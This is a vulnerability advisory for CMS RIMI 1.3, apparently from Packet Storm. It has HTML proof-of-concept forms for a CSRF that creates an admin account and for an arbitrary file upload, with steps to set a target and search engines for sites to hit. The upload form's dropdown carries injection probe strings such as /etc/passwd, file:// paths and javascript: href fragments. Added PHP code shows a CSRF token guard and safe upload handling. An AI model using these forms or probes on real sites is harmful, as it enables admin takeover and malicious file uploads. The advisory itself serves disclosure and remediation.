CMS RIMI 1.3 Cross Site Request Forgery / File Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

Packet Storm

=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/myroot593/RIMICMS |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] The following HTML code creates a new admin.

[+] Go to the line 9.

[+] Set the target site link, save the changes and apply.

[+] Save the code as poc.html.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Profile User Form</title>
</head>
<body>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">
    <!-- Text input for username -->
    <label for="username">Username:</label>
    <input type="text" id="username" name="username" required>

    <!-- Password input for password -->
    <label for="password">Password:</label>
    <input type="password" id="password" name="password" required>

    <!-- Password input for confirm password -->
    <label for="confirm_password">Confirm Password:</label>
    <input type="password" id="confirm_password" name="confirm_password" required>

    <!-- Text input for name -->
    <label for="nama">Nama:</label>
    <input type="text" id="nama" name="nama" required>

    <!-- Text input for email -->
    <label for="email">Email:</label>
    <input type="email" id="email" name="email" required>

    <!-- Hidden input for user ID -->
    <input type="hidden" name="id" value="">

    <!-- Submit button -->
    <button type="submit">Submit</button>
</form>

</body>
</html>
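
The form above carries no anti-CSRF token, so `tambah-user.php` cannot tell it apart from the admin panel's own form. A server-side guard of the following kind closes that gap; it is an added example, not RIMICMS code, and `harden_session_cookie()`, `csrf_token()`, `csrf_guard()` and the `csrf_token` field name are assumptions.

```php
<?php
// Added example, not RIMICMS code. All function names and the
// "csrf_token" field name are hypothetical.
declare(strict_types=1);

// Call before session_start(): keeps the session cookie off cross-site POSTs.
function harden_session_cookie(): void
{
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
}

// One random token per session. Every admin form prints it into a hidden
// input named "csrf_token" (HTML-escaped) next to its other fields.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Call at the top of tambah-user.php and every other state-changing admin
// script, after session_start(). $expectedOrigin is the site's own origin,
// for example "http://127.0.0.1" in the lab setup used by the PoC.
function csrf_guard(string $expectedOrigin): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return; // GET only renders the form; the handler must act on $_POST only
    }
    // A form hosted on another site, or opened from disk, sends a different Origin.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && strcasecmp($origin, $expectedOrigin) !== 0) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
    // The token lives in the admin's session, so a foreign page cannot supply it.
    $sent  = $_POST['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}
```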

------------------ [+] Part 2 : arbitrary file upload [+] -------------

[+] Go to the line 3.

[+] Set the target site link, save the changes and apply.

[+] Your file : 127.0.0.1/cmsrimi/content

[+] Save the code as poc.html.

<p class="sukses-form"></p>
<p class="error-form"></p>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">
<div class="form-group">
<label>Judul :</label>
<input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Isi Berita :</label>
<textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Kategori Berita :</label>
<select class="form-control" name="kategori_berita" id="kategori_berita" required=""><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|||>!(()&&!|||</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=’"()>’"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1’">1’"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=’">’"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!–><!–</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>
</div>
<div class="form-group">
<label>Status:</label>
<select class="form-control" name="status_berita" id="status_berita">
<option value="Diterbitkan">Diterbitkan</option>
<option value="Draft">Draft</option>
</select>
</div>
<div class="form-group">
<label>Gambar Berita</label>
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">
<p class="error-form"></p>
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
<p class="error-form"></p>
<p class="error-form"></p>
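
The `gambar_berita` file field in the form above is the entry point for the arbitrary file upload. A handler can restrict what it stores as in the following added example, which is not RIMICMS code; `store_news_image()`, the allowlist, the size limit and the destination directory are assumptions.

```php
<?php
// Added example, not RIMICMS code. store_news_image(), the allowlist and
// the default size limit are hypothetical.
declare(strict_types=1);

// Detected MIME type => extension assigned by the server.
const ALLOWED_IMAGES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// $file is $_FILES['gambar_berita']; returns the stored file name.
function store_news_image(array $file, string $destDir, int $maxBytes = 2000000): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_string($tmp) || !is_uploaded_file($tmp)) {
        throw new RuntimeException('Upload failed');
    }
    if (filesize($tmp) > $maxBytes) {
        throw new RuntimeException('File too large');
    }
    // Inspect the content itself; the client-supplied name and type are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = is_string($mime) ? (ALLOWED_IMAGES[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }
    // The file must also parse as an image, not merely start with image magic bytes.
    if (@getimagesize($tmp) === false) {
        throw new RuntimeException('Not a valid image');
    }
    // Random name plus server-chosen extension, so an uploaded name such as
    // "x.php" or "x.php.jpg" never reaches the content directory.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($target, 0644);
    return $name;
}
```

Serving the upload directory with script execution disabled, or keeping it outside the web root, limits the impact if one of these checks is bypassed.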

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
